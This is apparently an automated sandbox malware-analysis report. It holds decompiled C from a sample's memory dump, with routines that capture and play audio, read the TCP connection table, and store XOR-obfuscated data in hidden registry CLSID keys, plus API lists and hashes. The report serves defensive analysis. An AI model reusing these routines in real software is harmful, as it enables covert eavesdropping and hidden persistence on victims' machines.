                                                            				if(_t58 != 0) {
                                                            					_t78 = _a4 + 8;
                                                            					_t66 = (_t58 - 1 >> 4) + 1;
                                                            					do {
                                                            						E0463DE60(__ecx,  *((intOrPtr*)(_t78 - 8)),  *((intOrPtr*)(_t78 - 4)),  *_t78,  *((intOrPtr*)(_t78 + 4)));
                                                            						_t79 = _t79 + 8;
                                                            						_t78 = _t78 + 0x10;
                                                            						_t66 = _t66 - 1;
                                                            					} while (_t66 != 0);
                                                            				}
                                                            				Sleep(0x64);
                                                            				_t21 =  *((intOrPtr*)(_t39 + 0xc));
                                                            				if(_t21 != 2) {
                                                            					__eflags = _t21 - 3;
                                                            					if(__eflags != 0) {
                                                            						_t22 = L0463DB90(_t39, __eflags);
                                                            						goto L10;
                                                            					} else {
                                                            						_t22 = E0463D980(_t58, _t67);
                                                            						_a8 = _t22;
                                                            						__eflags = _t22;
                                                            						if(_t22 == 0) {
                                                            							goto L10;
                                                            						} else {
                                                            							_t16 = LocalSize(_t22) + 1; // 0x1
                                                            							_t41 = LocalAlloc(0x40, _t16);
                                                            							_t70 = _a8;
                                                            							_t18 = _t41 + 1; // 0x1
                                                            							_t48 = _t18;
                                                            							 *_t41 = 0x8e;
                                                            							E0465E060(_t48, _t70, _t23);
                                                            							LocalFree(_t70);
                                                            							_t27 = LocalSize(_t41);
                                                            							_push(_t48);
                                                            							_push(0x3f);
                                                            							_push(_t27);
                                                            							_push(_t41);
                                                            							E04631C60( *((intOrPtr*)(_v8 + 4)));
                                                            							return LocalFree(_t41);
                                                            						}
                                                            					}
                                                            				} else {
                                                            					_t22 = E0463D570(_t58, _t67);
                                                            					_a8 = _t22;
                                                            					if(_t22 == 0) {
                                                            						L10:
                                                            						return _t22;
                                                            					} else {
                                                            						_t10 = LocalSize(_t22) + 1; // 0x1
                                                            						_t43 = LocalAlloc(0x40, _t10);
                                                            						_t74 = _a8;
                                                            						_t12 = _t43 + 1; // 0x1
                                                            						_t52 = _t12;
                                                            						 *_t43 = 0x8e;
                                                            						E0465E060(_t52, _t74, _t30);
                                                            						LocalFree(_t74);
                                                            						_t34 = LocalSize(_t43);
                                                            						_push(_t52);
                                                            						_push(0x3f);
                                                            						_push(_t34);
                                                            						_push(_t43);
                                                            						E04631C60( *((intOrPtr*)(_v8 + 4)));
                                                            						return LocalFree(_t43);
                                                            					}
                                                            				}
                                                            			}























                                                            0x0463df13
                                                            0x0463df15
                                                            0x0463df17
                                                            0x0463df1a
                                                            0x0463df1c
                                                            0x0463df21
                                                            0x0463df2a
                                                            0x0463df2d
                                                            0x0463df30
                                                            0x0463df3b
                                                            0x0463df40
                                                            0x0463df43
                                                            0x0463df46
                                                            0x0463df46
                                                            0x0463df30
                                                            0x0463df4d
                                                            0x0463df53
                                                            0x0463df59
                                                            0x0463dfc0
                                                            0x0463dfc3
                                                            0x0463e028
                                                            0x00000000
                                                            0x0463dfc5
                                                            0x0463dfc5
                                                            0x0463dfca
                                                            0x0463dfcd
                                                            0x0463dfcf
                                                            0x00000000
                                                            0x0463dfd1
                                                            0x0463dfdc
                                                            0x0463dfe8
                                                            0x0463dfeb
                                                            0x0463dfef
                                                            0x0463dfef
                                                            0x0463dff2
                                                            0x0463dff6
                                                            0x0463e005
                                                            0x0463e008
                                                            0x0463e00a
                                                            0x0463e00e
                                                            0x0463e010
                                                            0x0463e011
                                                            0x0463e015
                                                            0x0463e023
                                                            0x0463e023
                                                            0x0463dfcf
                                                            0x0463df5b
                                                            0x0463df5b
                                                            0x0463df60
                                                            0x0463df65
                                                            0x0463e02d
                                                            0x0463e033
                                                            0x0463df6b
                                                            0x0463df76
                                                            0x0463df82
                                                            0x0463df85
                                                            0x0463df89
                                                            0x0463df89
                                                            0x0463df8c
                                                            0x0463df90
                                                            0x0463df9f
                                                            0x0463dfa2
                                                            0x0463dfa4
                                                            0x0463dfa8
                                                            0x0463dfaa
                                                            0x0463dfab
                                                            0x0463dfaf
                                                            0x0463dfbd
                                                            0x0463dfbd
                                                            0x0463df65

                                                            APIs
                                                            • Sleep.KERNEL32(00000064,?,?,?,?,?,0463D48F,?,?), ref: 0463DF4D
                                                            • LocalSize.KERNEL32(00000000), ref: 0463DF72
                                                            • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,?,?,0463D48F,?,?), ref: 0463DF7C
                                                            • LocalFree.KERNEL32(?), ref: 0463DF9F
                                                            • LocalSize.KERNEL32(00000000), ref: 0463DFA2
                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,0000003F), ref: 0463DFB5
                                                              • Part of subcall function 0463DE60: GetTcpTable.IPHLPAPI(00000000,?,00000001), ref: 0463DE80
                                                              • Part of subcall function 0463DE60: GetTcpTable.IPHLPAPI(00000000,?,00000001), ref: 0463DE9B
                                                            • LocalSize.KERNEL32(00000000), ref: 0463DFD8
                                                            • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,?,?,0463D48F,?,?), ref: 0463DFE2
                                                            • LocalFree.KERNEL32(?), ref: 0463E005
                                                            • LocalSize.KERNEL32(00000000), ref: 0463E008
                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,0000003F), ref: 0463E01B
                                                              • Part of subcall function 0463DB90: LocalAlloc.KERNEL32(00000040,74CF5A91,00000000,?,?), ref: 0463DBDE
                                                              • Part of subcall function 0463DB90: LocalFree.KERNEL32(?,?,?,?), ref: 0463DC00
                                                              • Part of subcall function 0463DB90: LocalFree.KERNEL32(?,?,?,?), ref: 0463DC1E
                                                              • Part of subcall function 0463DB90: LocalSize.KERNEL32(00000000), ref: 0463DC25
                                                              • Part of subcall function 0463DB90: LocalFree.KERNEL32(00000000,00000000,00000000,0000003F,?,?,?), ref: 0463DC3C
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Local$Free$Size$Alloc$Table$Sleep
                                                            • String ID:
                                                            • API String ID: 1439515551-0
                                                            • Opcode ID: f277c148c2324bc9d7fddac8046e8855cf850c87abc526863153641e9ca8ece8
                                                            • Instruction ID: 09abd47c208c34102afb50fe517c98f2eb0c48e25c525eb38b930aceb4cc8be0
                                                            • Opcode Fuzzy Hash: f277c148c2324bc9d7fddac8046e8855cf850c87abc526863153641e9ca8ece8
                                                            • Instruction Fuzzy Hash: E631C976A00218ABD714AFA5EC84D6BB79DEF59221B044159FD09D7241EB36FD10CBB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 93%
                                                            			E04631280(intOrPtr* __ecx) {
                                                            				void* _t38;
                                                            				void* _t39;
                                                            				void* _t40;
                                                            				intOrPtr* _t42;
                                                            				intOrPtr* _t43;
                                                            				struct wavehdr_tag** _t45;
                                                            				struct wavehdr_tag** _t46;
                                                            				void* _t47;
                                                            
                                                            				_t42 = __ecx;
                                                            				 *__ecx = 0x467c5cc;
                                                            				if( *((char*)(__ecx + 0x44)) != 0) {
                                                            					waveInStop( *(__ecx + 0x18));
                                                            					waveInReset( *(__ecx + 0x18));
                                                            					_t46 = __ecx + 0x30;
                                                            					_t40 = 2;
                                                            					do {
                                                            						waveInUnprepareHeader( *(__ecx + 0x18),  *_t46, 0x20);
                                                            						_t46 =  &(_t46[1]);
                                                            						_t40 = _t40 - 1;
                                                            					} while (_t40 != 0);
                                                            					waveInClose( *(__ecx + 0x18));
                                                            					TerminateThread( *(__ecx + 0x2c), 0xffffffff);
                                                            				}
                                                            				if( *((char*)(_t42 + 0x45)) != 0) {
                                                            					waveOutReset( *(_t42 + 0x40));
                                                            					_t45 = _t42 + 0x30;
                                                            					_t39 = 2;
                                                            					do {
                                                            						waveOutUnprepareHeader( *(_t42 + 0x40),  *_t45, 0x20);
                                                            						_t45 =  &(_t45[1]);
                                                            						_t39 = _t39 - 1;
                                                            					} while (_t39 != 0);
                                                            					waveOutClose( *(_t42 + 0x40));
                                                            				}
                                                            				_t43 = _t42 + 0x30;
                                                            				_t38 = 2;
                                                            				do {
                                                            					L04655B0F( *((intOrPtr*)(_t43 - 0x28)));
                                                            					_push(0x20);
                                                            					E04655B47( *_t43);
                                                            					L04655B0F( *((intOrPtr*)(_t43 - 0x20)));
                                                            					_push(0x20);
                                                            					E04655B47( *((intOrPtr*)(_t43 + 8)));
                                                            					_t47 = _t47 + 0x18;
                                                            					_t43 = _t43 + 4;
                                                            					_t38 = _t38 - 1;
                                                            				} while (_t38 != 0);
                                                            				CloseHandle( *(_t42 + 0x24));
                                                            				CloseHandle( *(_t42 + 0x28));
                                                            				return CloseHandle( *(_t42 + 0x2c));
                                                            			}











                                                            0x04631283
                                                            0x04631289
                                                            0x0463128f
                                                            0x04631294
                                                            0x0463129d
                                                            0x046312a3
                                                            0x046312a6
                                                            0x046312b0
                                                            0x046312b7
                                                            0x046312bd
                                                            0x046312c0
                                                            0x046312c0
                                                            0x046312c8
                                                            0x046312d3
                                                            0x046312d3
                                                            0x046312dd
                                                            0x046312e2
                                                            0x046312e8
                                                            0x046312eb
                                                            0x046312f0
                                                            0x046312f7
                                                            0x046312fd
                                                            0x04631300
                                                            0x04631300
                                                            0x04631308
                                                            0x04631308
                                                            0x0463130e
                                                            0x04631311
                                                            0x04631316
                                                            0x04631319
                                                            0x0463131e
                                                            0x04631322
                                                            0x0463132a
                                                            0x0463132f
                                                            0x04631334
                                                            0x04631339
                                                            0x0463133c
                                                            0x0463133f
                                                            0x0463133f
                                                            0x0463134d
                                                            0x04631352
                                                            0x0463135c

                                                            APIs
                                                            • waveInStop.WINMM(?), ref: 04631294
                                                            • waveInReset.WINMM(?), ref: 0463129D
                                                            • waveInUnprepareHeader.WINMM(?,?,00000020), ref: 046312B7
                                                            • waveInClose.WINMM(?), ref: 046312C8
                                                            • TerminateThread.KERNEL32(?,000000FF), ref: 046312D3
                                                            • waveOutReset.WINMM(?), ref: 046312E2
                                                            • waveOutUnprepareHeader.WINMM(?,?,00000020), ref: 046312F7
                                                            • waveOutClose.WINMM(?), ref: 04631308
                                                            • CloseHandle.KERNEL32(?), ref: 0463134D
                                                            • CloseHandle.KERNEL32(?), ref: 04631352
                                                            • CloseHandle.KERNEL32(?), ref: 04631357
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: wave$Close$Handle$HeaderResetUnprepare$StopTerminateThread
                                                            • String ID:
                                                            • API String ID: 1104916709-0
                                                            • Opcode ID: 675c0c1ecf982a7eec280db0c8ccdcb29834730b2d239f4a8cd6a738c3ca60ce
                                                            • Instruction ID: 19a8ddbfa863a4024333eb9fc8aa0a970693eaf6bbfce4611d15fe8070bfffa3
                                                            • Opcode Fuzzy Hash: 675c0c1ecf982a7eec280db0c8ccdcb29834730b2d239f4a8cd6a738c3ca60ce
                                                            • Instruction Fuzzy Hash: BE21E472600612FFEB265F65DD0CA48BF72FF09311F005124EA4562AB1EB26BC66DF80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 93%
                                                            			E0463E880(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                            				signed int _v8;
                                                            				char _v88;
                                                            				short _v608;
                                                            				short _v1128;
                                                            				void* _v1132;
                                                            				char _v1136;
                                                            				int* _v1140;
                                                            				int _v1144;
                                                            				void* _v1148;
                                                            				int _v1152;
                                                            				int _v1156;
                                                            				void* __ebp;
                                                            				signed int _t49;
                                                            				int* _t57;
                                                            				void* _t72;
                                                            				void* _t74;
                                                            				void* _t75;
                                                            				int _t84;
                                                            				signed int* _t85;
                                                            				signed int* _t89;
                                                            				char _t93;
                                                            				int* _t95;
                                                            				char _t96;
                                                            				int* _t98;
                                                            				signed int* _t99;
                                                            				signed int _t101;
                                                            				void* _t102;
                                                            				void* _t103;
                                                            				void* _t104;
                                                            				signed int _t117;
                                                            
                                                            				_t49 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t49 ^ _t101;
                                                            				_t95 = 0;
                                                            				_t85 = L"Pg";
                                                            				_v1140 = 0;
                                                            				E04646050(__ebx, _t85,  &_v88, 0, __esi);
                                                            				wsprintfW( &_v1128, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
                                                            				_t103 = _t102 + 0xc;
                                                            				_t84 = 0;
                                                            				_t57 = RegOpenKeyExW(0x80000002,  &_v1128, 0, 0x20119,  &_v1132);
                                                            				if(_t57 == 0) {
                                                            					_v1144 = 0x104;
                                                            					if(RegEnumKeyExW(_v1132, 0,  &_v608,  &_v1144, _t57, _t57, _t57, _t57) == 0) {
                                                            						_push(__esi);
                                                            						do {
                                                            							_t84 = _t84 + 1;
                                                            							if(_v1144 == 0x10) {
                                                            								_v1152 = 4;
                                                            								_t98 = 0;
                                                            								_v1136 = 0;
                                                            								_v1148 = 0;
                                                            								if(RegOpenKeyExW(_v1132,  &_v608, 0, 0x20119,  &_v1148) != 0) {
                                                            									L8:
                                                            									_t96 = 1;
                                                            								} else {
                                                            									if(RegQueryValueExW(_v1148, "2", 0,  &_v1156,  &_v1136,  &_v1152) == 0) {
                                                            										_t98 =  ==  ? 1 : 0;
                                                            									}
                                                            									RegCloseKey(_v1148);
                                                            									_t96 = _v1136;
                                                            									if(_t98 == 0) {
                                                            										goto L8;
                                                            									}
                                                            								}
                                                            								_push(_t85);
                                                            								_v1136 = 0;
                                                            								_t85 = _v1132;
                                                            								_t99 = E04640C60(_t85,  &_v608, _t85,  &_v1136);
                                                            								_t103 = _t103 + 0xc;
                                                            								if(_t99 == 0) {
                                                            									_t95 = _v1140;
                                                            								} else {
                                                            									_t93 = _v1136;
                                                            									if(_t93 > 1) {
                                                            										_t31 = _t93 - 1; // -1
                                                            										_t74 = _t31;
                                                            										 *(_t74 + _t99) =  *(_t74 + _t99) ^  *_t99;
                                                            										_t75 = _t74 - 1;
                                                            										while(_t75 != 0) {
                                                            											 *(_t75 + _t99) =  *(_t75 + _t99) ^  *(_t75 +  &(_t99[0]));
                                                            											_t75 = _t75 - 1;
                                                            										}
                                                            										_t89 = _t75 + _t99;
                                                            										 *_t89 =  *_t89 ^ _t89[0];
                                                            										_t117 =  *_t89;
                                                            									}
                                                            									_t85 = _t99;
                                                            									_t72 = E0463F050(_t84, _t93, _t96, _t99, _t117, 1, _t96);
                                                            									_t95 = _v1140;
                                                            									_t104 = _t103 + 8;
                                                            									if(_t72 != 0) {
                                                            										_v1140 = _t95;
                                                            									}
                                                            									L04655B0F(_t99);
                                                            									_t103 = _t104 + 4;
                                                            								}
                                                            							}
                                                            							_v1144 = 0x104;
                                                            						} while (RegEnumKeyExW(_v1132, _t84,  &_v608,  &_v1144, 0, 0, 0, 0) == 0);
                                                            					}
                                                            					RegCloseKey(_v1132);
                                                            				}
                                                            				return E04655AFE(_v8 ^ _t101);
                                                            			}

































                                                            0x0463e889
                                                            0x0463e890
                                                            0x0463e895
                                                            0x0463e89a
                                                            0x0463e89f
                                                            0x0463e8a5
                                                            0x0463e8ba
                                                            0x0463e8c0
                                                            0x0463e8c9
                                                            0x0463e8de
                                                            0x0463e8e6
                                                            0x0463e8f6
                                                            0x0463e917
                                                            0x0463e91d
                                                            0x0463e920
                                                            0x0463e920
                                                            0x0463e928
                                                            0x0463e934
                                                            0x0463e944
                                                            0x0463e954
                                                            0x0463e95a
                                                            0x0463e968
                                                            0x0463e9ba
                                                            0x0463e9ba
                                                            0x0463e96a
                                                            0x0463e993
                                                            0x0463e9a1
                                                            0x0463e9a1
                                                            0x0463e9aa
                                                            0x0463e9b0
                                                            0x0463e9b8
                                                            0x00000000
                                                            0x00000000
                                                            0x0463e9b8
                                                            0x0463e9bf
                                                            0x0463e9c6
                                                            0x0463e9d2
                                                            0x0463e9e3
                                                            0x0463e9e5
                                                            0x0463e9ea
                                                            0x0463ea41
                                                            0x0463e9ec
                                                            0x0463e9ec
                                                            0x0463e9f5
                                                            0x0463e9f9
                                                            0x0463e9f9
                                                            0x0463e9fc
                                                            0x0463e9ff
                                                            0x0463ea02
                                                            0x0463ea08
                                                            0x0463ea0b
                                                            0x0463ea0b
                                                            0x0463ea10
                                                            0x0463ea16
                                                            0x0463ea16
                                                            0x0463ea16
                                                            0x0463ea1b
                                                            0x0463ea1d
                                                            0x0463ea22
                                                            0x0463ea28
                                                            0x0463ea2d
                                                            0x0463ea30
                                                            0x0463ea30
                                                            0x0463ea37
                                                            0x0463ea3c
                                                            0x0463ea3c
                                                            0x0463e9ea
                                                            0x0463ea55
                                                            0x0463ea74
                                                            0x0463ea7c
                                                            0x0463ea83
                                                            0x0463ea83
                                                            0x0463ea9a

                                                            APIs
                                                              • Part of subcall function 04646050: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,0000038F), ref: 046461F1
                                                              • Part of subcall function 04646050: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 0464621F
                                                              • Part of subcall function 04646050: RegCloseKey.ADVAPI32(?), ref: 04646235
                                                            • wsprintfW.USER32 ref: 0463E8BA
                                                            • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?), ref: 0463E8DE
                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0463E90F
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020119,?,74CB43E0), ref: 0463E960
                                                            • RegQueryValueExW.ADVAPI32(?,0467E124,00000000,?,?,00000004), ref: 0463E98B
                                                            • RegCloseKey.ADVAPI32(?), ref: 0463E9AA
                                                            • RegEnumKeyExW.ADVAPI32(?,00000001,?,00000010,00000000,00000000,00000000,00000000,74CB43E0), ref: 0463EA6E
                                                            • RegCloseKey.ADVAPI32(?), ref: 0463EA83
                                                            Strings
                                                            • SOFTWARE\Classes\CLSID\%s, xrefs: 0463E8B4
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseOpen$EnumQueryValue$wsprintf
                                                            • String ID: SOFTWARE\Classes\CLSID\%s
                                                            • API String ID: 617139280-1183003970
                                                            • Opcode ID: 1df1529206a9745500ef68e32227d10afb57df82f4200a52d4c55618c22bbe59
                                                            • Instruction ID: b413d0b1382b1df492d15550214e36d01361446df70f40446d4f54afdf554ece
                                                            • Opcode Fuzzy Hash: 1df1529206a9745500ef68e32227d10afb57df82f4200a52d4c55618c22bbe59
                                                            • Instruction Fuzzy Hash: 375163B19041689FDB218F60DC44BAAB77CEF45305F1001D9EA49A7241FB76AE88CF65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 86%
                                                            			E0463EAA0(void* __ebx, char* __ecx, int __edx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				char _v88;
                                                            				short _v608;
                                                            				void* _v612;
                                                            				char _v616;
                                                            				signed int _t34;
                                                            				int _t64;
                                                            				void* _t78;
                                                            				void* _t79;
                                                            				char* _t85;
                                                            				signed int _t86;
                                                            
                                                            				_t34 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t34 ^ _t86;
                                                            				_t64 = __edx;
                                                            				_t85 = __ecx;
                                                            				if(__edx >= 0x5c) {
                                                            					if(__edx !=  *((intOrPtr*)(__ecx + 0x1c)) + 0x5c +  *((intOrPtr*)(__ecx + 0x24)) +  *((intOrPtr*)(__ecx + 0x20))) {
                                                            						goto L1;
                                                            					} else {
                                                            						_push(__edi);
                                                            						E04646050(__edx, L"Pg",  &_v88, __edi, __ecx);
                                                            						wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s\\%s",  &_v88, __ecx + 0x28);
                                                            						E046454D0(_t85, _t64);
                                                            						_v616 = 1;
                                                            						_v612 = 0;
                                                            						if(RegCreateKeyExW(0x80000002,  &_v608, 0, 0, 0, 0x20106, 0,  &_v612, 0) == 0) {
                                                            							RegSetValueExW(_v612, "2", 0, 4,  &_v616, 4);
                                                            							RegCloseKey(_v612);
                                                            						}
                                                            						_v612 = 0;
                                                            						if(RegCreateKeyExW(0x80000002,  &_v608, 0, 0, 0, 0x20106, 0,  &_v612, 0) == 0) {
                                                            							RegSetValueExW(_v612, "1", 0, 3, _t85, _t64);
                                                            							asm("sbb edi, edi");
                                                            							RegCloseKey(_v612);
                                                            						}
                                                            						if(_t64 > 1) {
                                                            							_t78 = _t64 - 1;
                                                            							 *(_t78 + _t85) =  *(_t78 + _t85) ^  *_t85;
                                                            							_t79 = _t78 - 1;
                                                            							while(_t79 != 0) {
                                                            								 *(_t79 + _t85) =  *(_t79 + _t85) ^  *(_t79 +  &(_t85[1]));
                                                            								_t79 = _t79 - 1;
                                                            							}
                                                            							 *(_t79 + _t85) =  *(_t79 + _t85) ^  *(_t79 +  &(_t85[1]));
                                                            						}
                                                            						return E04655AFE(_v8 ^ _t86);
                                                            					}
                                                            				} else {
                                                            					L1:
                                                            					return E04655AFE(_v8 ^ _t86);
                                                            				}
                                                            			}














                                                            0x0463eaa9
                                                            0x0463eab0
                                                            0x0463eab4
                                                            0x0463eab7
                                                            0x0463eabc
                                                            0x0463eae0
                                                            0x00000000
                                                            0x0463eae2
                                                            0x0463eae2
                                                            0x0463eaeb
                                                            0x0463eb04
                                                            0x0463eb11
                                                            0x0463eb1e
                                                            0x0463eb3c
                                                            0x0463eb5a
                                                            0x0463eb74
                                                            0x0463eb7c
                                                            0x0463eb7c
                                                            0x0463eb8a
                                                            0x0463ebb6
                                                            0x0463ebcd
                                                            0x0463ebd7
                                                            0x0463ebda
                                                            0x0463ebda
                                                            0x0463ebe3
                                                            0x0463ebe7
                                                            0x0463ebea
                                                            0x0463ebed
                                                            0x0463ebf0
                                                            0x0463ebf6
                                                            0x0463ebf9
                                                            0x0463ebf9
                                                            0x0463ec02
                                                            0x0463ec02
                                                            0x0463ec17
                                                            0x0463ec17
                                                            0x0463eabf
                                                            0x0463eabf
                                                            0x0463eacf
                                                            0x0463eacf

                                                            APIs
                                                            • wsprintfW.USER32 ref: 0463EB04
                                                            • RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,00020106,00000000,?,00000000), ref: 0463EB4C
                                                            • RegSetValueExW.ADVAPI32(00000000,0467E124,00000000,00000004,00000001,00000004), ref: 0463EB74
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0463EB7C
                                                            • RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,00020106,00000000,00000000,00000000), ref: 0463EBAE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Create$CloseValuewsprintf
                                                            • String ID: SOFTWARE\Classes\CLSID\%s\%s$\
                                                            • API String ID: 1643814758-3376016971
                                                            • Opcode ID: 674bd381b84b7a30b50fa7ffe2177fb5829b69ee14cce6eaeb2f573acb53f48e
                                                            • Instruction ID: 965262c81fc00a7f2ce6cb3705c05acf8533ab49f00dfa97f0738d8780a6b2e4
                                                            • Opcode Fuzzy Hash: 674bd381b84b7a30b50fa7ffe2177fb5829b69ee14cce6eaeb2f573acb53f48e
                                                            • Instruction Fuzzy Hash: 0941F730644358ABEB31DF64DC89FAAB7B9FF44704F1000D9E506AA281FB72AD48CB54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 94%
                                                            			E0463E700(void* __ebx, char __ecx, void* __edi, void* __esi, void* __eflags) {
                                                            				signed int _v8;
                                                            				char _v92;
                                                            				short _v612;
                                                            				short _v1132;
                                                            				int _v1136;
                                                            				void* _v1140;
                                                            				void* _v1144;
                                                            				char _v1148;
                                                            				signed int _t27;
                                                            				int* _t35;
                                                            				char _t54;
                                                            				int _t65;
                                                            				signed int _t66;
                                                            
                                                            				_t27 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t27 ^ _t66;
                                                            				_t54 = __ecx;
                                                            				E04646050(__ecx, L"Pg",  &_v92, __edi, __esi);
                                                            				wsprintfW( &_v1132, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v92);
                                                            				_t65 = 0;
                                                            				_t35 = RegOpenKeyExW(0x80000002,  &_v1132, 0, 0x20119,  &_v1140);
                                                            				if(_t35 != 0) {
                                                            					L8:
                                                            					if(_t54 == 0) {
                                                            						E0463E660();
                                                            						return E04655AFE(_v8 ^ _t66);
                                                            					} else {
                                                            						E0463E5F0();
                                                            						return E04655AFE(_v8 ^ _t66);
                                                            					}
                                                            				}
                                                            				_v1136 = 0x104;
                                                            				if(RegEnumKeyExW(_v1140, 0,  &_v612,  &_v1136, _t35, _t35, _t35, _t35) != 0) {
                                                            					L7:
                                                            					RegCloseKey(_v1140);
                                                            					goto L8;
                                                            				} else {
                                                            					do {
                                                            						_t65 = _t65 + 1;
                                                            						if(_v1136 == 0x10) {
                                                            							_v1148 = _t54;
                                                            							_v1144 = 0;
                                                            							if(RegCreateKeyExW(_v1140,  &_v612, 0, 0, 0, 0x20106, 0,  &_v1144, 0) == 0) {
                                                            								RegSetValueExW(_v1144, "2", 0, 4,  &_v1148, 4);
                                                            								RegCloseKey(_v1144);
                                                            							}
                                                            						}
                                                            						_v1136 = 0x104;
                                                            					} while (RegEnumKeyExW(_v1140, _t65,  &_v612,  &_v1136, 0, 0, 0, 0) == 0);
                                                            					goto L7;
                                                            				}
                                                            			}
















                                                            0x0463e709
                                                            0x0463e710
                                                            0x0463e715
                                                            0x0463e720
                                                            0x0463e735
                                                            0x0463e744
                                                            0x0463e759
                                                            0x0463e761
                                                            0x0463e84a
                                                            0x0463e84c
                                                            0x0463e864
                                                            0x0463e879
                                                            0x0463e84e
                                                            0x0463e84e
                                                            0x0463e863
                                                            0x0463e863
                                                            0x0463e84c
                                                            0x0463e771
                                                            0x0463e798
                                                            0x0463e842
                                                            0x0463e848
                                                            0x00000000
                                                            0x0463e7a0
                                                            0x0463e7a0
                                                            0x0463e7a0
                                                            0x0463e7a8
                                                            0x0463e7b2
                                                            0x0463e7cc
                                                            0x0463e7e5
                                                            0x0463e7ff
                                                            0x0463e80b
                                                            0x0463e80b
                                                            0x0463e7e5
                                                            0x0463e81b
                                                            0x0463e83a
                                                            0x00000000
                                                            0x0463e7a0

                                                            APIs
                                                              • Part of subcall function 04646050: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,0000038F), ref: 046461F1
                                                              • Part of subcall function 04646050: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 0464621F
                                                              • Part of subcall function 04646050: RegCloseKey.ADVAPI32(?), ref: 04646235
                                                            • wsprintfW.USER32 ref: 0463E735
                                                            • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?), ref: 0463E759
                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0463E78A
                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00020106,00000000,?,00000000), ref: 0463E7DD
                                                            • RegSetValueExW.ADVAPI32(00000000,0467E124,00000000,00000004,?,00000004), ref: 0463E7FF
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0463E80B
                                                            • RegEnumKeyExW.ADVAPI32(?,00000001,?,00000010,00000000,00000000,00000000,00000000), ref: 0463E834
                                                            • RegCloseKey.ADVAPI32(?), ref: 0463E848
                                                            Strings
                                                            • SOFTWARE\Classes\CLSID\%s, xrefs: 0463E72F
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close$EnumOpenValue$CreateQuerywsprintf
                                                            • String ID: SOFTWARE\Classes\CLSID\%s
                                                            • API String ID: 2517750250-1183003970
                                                            • Opcode ID: 2bb271f5db99af792f3c65c5c9eec21e2ebaabe66a7307eb982caa4084c27a09
                                                            • Instruction ID: 54f58713b4737784f6e58f61e052c967f5ed4bdb6d8b1388ea1aebcca8a4ee3c
                                                            • Opcode Fuzzy Hash: 2bb271f5db99af792f3c65c5c9eec21e2ebaabe66a7307eb982caa4084c27a09
                                                            • Instruction Fuzzy Hash: CF4166B1A44218ABEB209F60DC49FEAB77CEB45705F0001A9AB09E6181FB716E44CF65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 88%
